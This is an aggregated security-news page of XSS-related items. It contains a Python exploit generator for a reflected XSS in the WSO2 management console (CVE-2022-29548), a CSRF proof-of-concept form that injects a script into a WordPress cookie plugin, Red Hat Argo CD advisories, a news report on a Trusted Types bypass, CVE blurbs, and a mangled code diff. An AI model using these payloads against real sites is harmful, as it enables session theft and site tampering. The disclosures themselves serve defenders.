WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

    # Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;     # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;    # API Microgateway 2.2.0;    # Data Analytics Server 3.2.0;    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;    # Identity Server Analytics 5.5.0 and 5.6.0;    # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False):    log.info(f"Generating payload for {url}...")    if custom_payload:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")    else:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url):    if url.count("/") > 2:        return f"{url.split('/')[0]}//{url.split('/')[2]}"    else:        return urldef check_payload(payload):    encoded_characters = ['"', '<', '>']    if any(character in payload for character in encoded_characters):        log.info(f"Unsupported character(s) (\", <, >) found in payload.")        return False    else:        return urllib.parse.quote(payload)if __name__ == "__main__":    # Parse command line    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)    required_arguments = parser.add_argument_group('required arguments')    required_arguments.add_argument("-t", "--target",                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",                        required="True", action="store")    parser.add_argument("-p", "--payload",                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",                        action="store", default=False)    args = parser.parse_args()    # Clean user target input    args.target = clean_url_input(args.target.lower())    # Check for unsupported characters in custom payload; URL-encode as required    if args.payload:        args.payload = check_payload(args.payload)        if args.payload:            generate_payload(args.target, args.payload)    else:        generate_payload(args.target)

WSO2 Management Console Cross Site Scripting

Red Hat Security Advisory 2022-5192-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5192-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5192  
Issue date:        2022-06-24  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016   
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.3.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allow a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrZYPdzjgjWX9erEAQjrKg//fhNsc37/PGObQ+ILtKev6tbnelvEZXen  
q4eqQw+qbj2BXJyBVudmB1yrnMYc5ZcQViuQwAbhFafexFR5b6UjGr+g8x+5lSIq  
o/RBisD/Ob7/uavZua+ZzRutE3ER/f5YVK86AvK5cbk8hAlTtL0UN7RlFictYW+0  
hld0OyTXKUioPgwjZagQX7fhcyAKJsMIpnG8jZfygSsDje0fIDAHsyPfPGVWibUM  
1mRE9x618hFD+Dml70BpXE5X2CTnyfIQbWtPmR3KX5muhnh64zpNk3jGHhtjIqI9  
zT7CLR8o5Dvr6/n+HLT4WjPmfLiX2Hbo7fe4e4y2xdfkjDXPw4HoLr9ZF30FplG1  
eMhXCBWqyGYcYWh77lZlFLLQaz/ZE5pf7DxqwGzWBUUVrBFEJ+bIQKjB/y6WavnC  
rxCboZoqRifcvyKM1mDUcBK9YO14j9GXwb2Xu1IK7Z92RXZzZxIyRmJNRZDMzGF9  
uWxqBXbuSF/eRQFrRhJn8aeVzzxPMiqe/nRa1JsXJdMD8gyefVPloAVeRNx/0EbO  
4CpG2IGmQevfFx+E1ADM0X72TE0Bm1nzTSEd6D4i2DiA/NyYo2Ape3In9lHg8qYV  
XtcXBwBe14OJca+iAYTr3hMF/xzrCtfGd/lyf4ikQUMDWaNi2ixzA28MejDFJ0yl  
8b5s087AQwk=  
=FmJg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5192-01

WordPress Plugin UK Cookie is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also possible. WordPress Plugin UK Cookie version 1.1 is vulnerable; other versions may also be affected.

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

    <html>
    <body>
    <form action="https://example.com/wp-admin/options.php" method="POST">
    <input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
    <input type="hidden" name="action" value="update" />
    <input type="hidden" name="&#95;wpnonce" value="e909307b13" />
    <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
    <input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
    <input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>

CVE-2013-2180: CVE-2012-5856 uk-cookie plugin XSS · Issue #184 · wpscanteam/wpscan

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

John Leyden 27 June 2022 at 15:25 UTC

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

Security researchers have uncovered multiple unprotected properties to bypass Trusted Types, a widely used web security mechanism, in some scenarios.

Trusted Types is an important technology that allows websites to define strict rules on handling various DOM (Document Object Model) properties, a useful technique in guarding against DOM-based cross-site scripting (XSS) attacks.

A bypass discovered by well-known researcher Masato Kinugawa uses attribute properties to bypass the protection that Trusted Types would normally offer.

If a site was to use these properties and was vulnerable to DOM XSS then Trusted Types would not protect it, Kinugawa found. If a site modified an existing attribute value via nodeValue/textContent, as explained in a post on a Chrome security mailing list, then Trusted Types would ignore the assignment completely.

Catch up on the latest browser-related security news and analysis

The vulnerability was demonstrated in Chrome v100.0.4892.0 (Official Build) canary (64-bit). Other versions of Chrome and other browsers may be vulnerable, but this has not been tested.

The latest versions of Chrome address the problem.

The vulnerability – tracked as CVE-2022-1494 and said to involve “insufficient data validation in Trusted Types” – was first reported on February 16 but details were only publicly released last week.

The Daily Swig contacted both Kinugawa and Krzysztof Kotowicz, the Google software engineer who created Trusted Types, for comment. No word back, as yet, but we’ll update this story as and when more information comes to hand.

RELATED Google checks rise of DOM XSS with Trusted Types

Untrusted types: Researcher demos trick to beat Trusted Types protection in Google Chrome

Cross Site Scripting (XSS) vulnerability in Ruckus Wireless ZoneDirector 9.8.3.0.

CVE-2020-21161

A vulnerability was found in Air Transfer 1.0.14/1.2.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

CVE-2017-20100

An update is now available for Red Hat OpenShift GitOps 1.4.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-31016: argocd: vulnerable to an uncontrolled memory consumption bug
* CVE-2022-31034: argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.
* CVE-2022-31035: argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI
* CVE-2022-31036: argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

发布：

2022-06-22

已更新：

2022-06-22

**RHSA-2022:5153 - Security Advisory**

*   概述
*   更新的软件包

**概述**

Important: Red Hat OpenShift GitOps security update

**类型/严重性**

Security Advisory: Important

**标题**

An update is now available for Red Hat OpenShift GitOps 1.4.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**描述**

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.  

Security Fix(es):  

*   argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI. (CVE-2022-31034)
*   argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI (CVE-2022-31035)
*   argocd: vulnerable to an uncontrolled memory consumption bug (CVE-2022-31016)
*   argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**受影响的产品**

*   Red Hat OpenShift GitOps 1.4 x86\_64

**修复**

*   BZ - 2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI
*   BZ - 2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.
*   BZ - 2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug
*   BZ - 2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

**CVE**

*   CVE-2022-1271
*   CVE-2022-31016
*   CVE-2022-31034
*   CVE-2022-31035
*   CVE-2022-31036

**参考**

*   https://access.redhat.com/security/updates/classification/#important

**Red Hat OpenShift GitOps 1.4**

SRPM

x86\_64

Red Hat 安全团队联络方式为 secalert@redhat.com。 更多联络细节请参考 https://access.redhat.com/security/team/contact/。

RHSA-2022:5153: Red Hat Security Advisory: Red Hat OpenShift GitOps security update

Cross-site Scripting (XSS) - Generic in GitHub repository ionicabizau/parse-url prior to 7.0.0.

@@ -1,8 +1,10 @@ "use strict"  
// Dependencies const parsePath \= require("parse-path") , normalizeUrl \= require("normalize-url")  
  
/\*\* \* parseUrl \* Parses the input url. @@ -12,7 +14,7 @@ const parsePath = require("parse-path") \* @name parseUrl \* @function \* @param {String} url The input url. \* @param {Boolean|Object} normalize Wheter to normalize the url or not. \* @param {Boolean|Object} normalize Whether to normalize the url or not. \* Default is \`false\`. If \`true\`, the url will \* be normalized. If an object, it will be the \* options object sent to \[\`normalize-url\`\](https://github.com/sindresorhus/normalize-url). @@ -21,21 +23,26 @@ const parsePath = require("parse-path") \* \* @return {Object} An object containing the following fields: \* \* - \`protocols\` (Array): An array with the url protocols (usually it has one element). \* - \`protocol\` (String): The first protocol, \`"ssh"\` (if the url is a ssh url) or \`"file"\`. \* - \`port\` (null|Number): The domain port. \* - \`resource\` (String): The url domain (including subdomains). \* - \`user\` (String): The authentication user (usually for ssh urls). \* - \`pathname\` (String): The url pathname. \* - \`hash\` (String): The url hash. \* - \`search\` (String): The url querystring value. \* - \`href\` (String): The input url. \* - \`query\` (Object): The url querystring, parsed as object. \* \- \`protocols\` (Array): An array with the url protocols (usually it has one element). \* \- \`protocol\` (String): The first protocol, \`"ssh"\` (if the url is a ssh url) or \`"file"\`. \* \- \`port\` (null|Number): The domain port. \* \- \`resource\` (String): The url domain (including subdomains). \* \- \`user\` (String): The authentication user (usually for ssh urls). \* \- \`pathname\` (String): The url pathname. \* \- \`hash\` (String): The url hash. \* \- \`search\` (String): The url querystring value. \* \- \`href\` (String): The input url. \* \- \`query\` (Object): The url querystring, parsed as object. \*/ function parseUrl(url, normalize \= false) { const parseUrl \= (url, normalize \= false) \=> {  
// Constants const GIT\_RE \= /((git@|http(s)?:\\/\\/)(\[\\w\\.@\]+)(\\/|:))((\[\\~,\\w,\\-,\\\_,\\/\]+)(.git){0,1}((\\/){0,1}))/  
if (typeof url !== "string" || !url.trim()) { throw new Error("Invalid url.") }  
if (normalize) { if (typeof normalize !== "object") { normalize \= { @@ -44,7 +51,21 @@ function parseUrl(url, normalize = false) { } url \= normalizeUrl(url, normalize) }  
const parsed \= parsePath(url)  
// Potential git-ssh urls if (parsed.protocol \=== "file") { const matched \= parsed.href.match(GIT\_RE) if (matched) { parsed.protocols \= \["ssh"\] parsed.protocol \= "ssh" parsed.resource \= matched\[4\] parsed.user \= "git" parsed.pathname \= \`/${matched\[6\]}\` } }  
return parsed; }

CVE-2022-2217: Refactor codebase, upgrade dependencies · IonicaBizau/parse-url@21c72ab

The Brizy WordPress plugin before 2.4.2 does not sanitise and escape some element content, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks

CVE-2022-2041

The Brizy WordPress plugin before 2.4.2 does not sanitise and escape some element URL, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks

Tag

#xss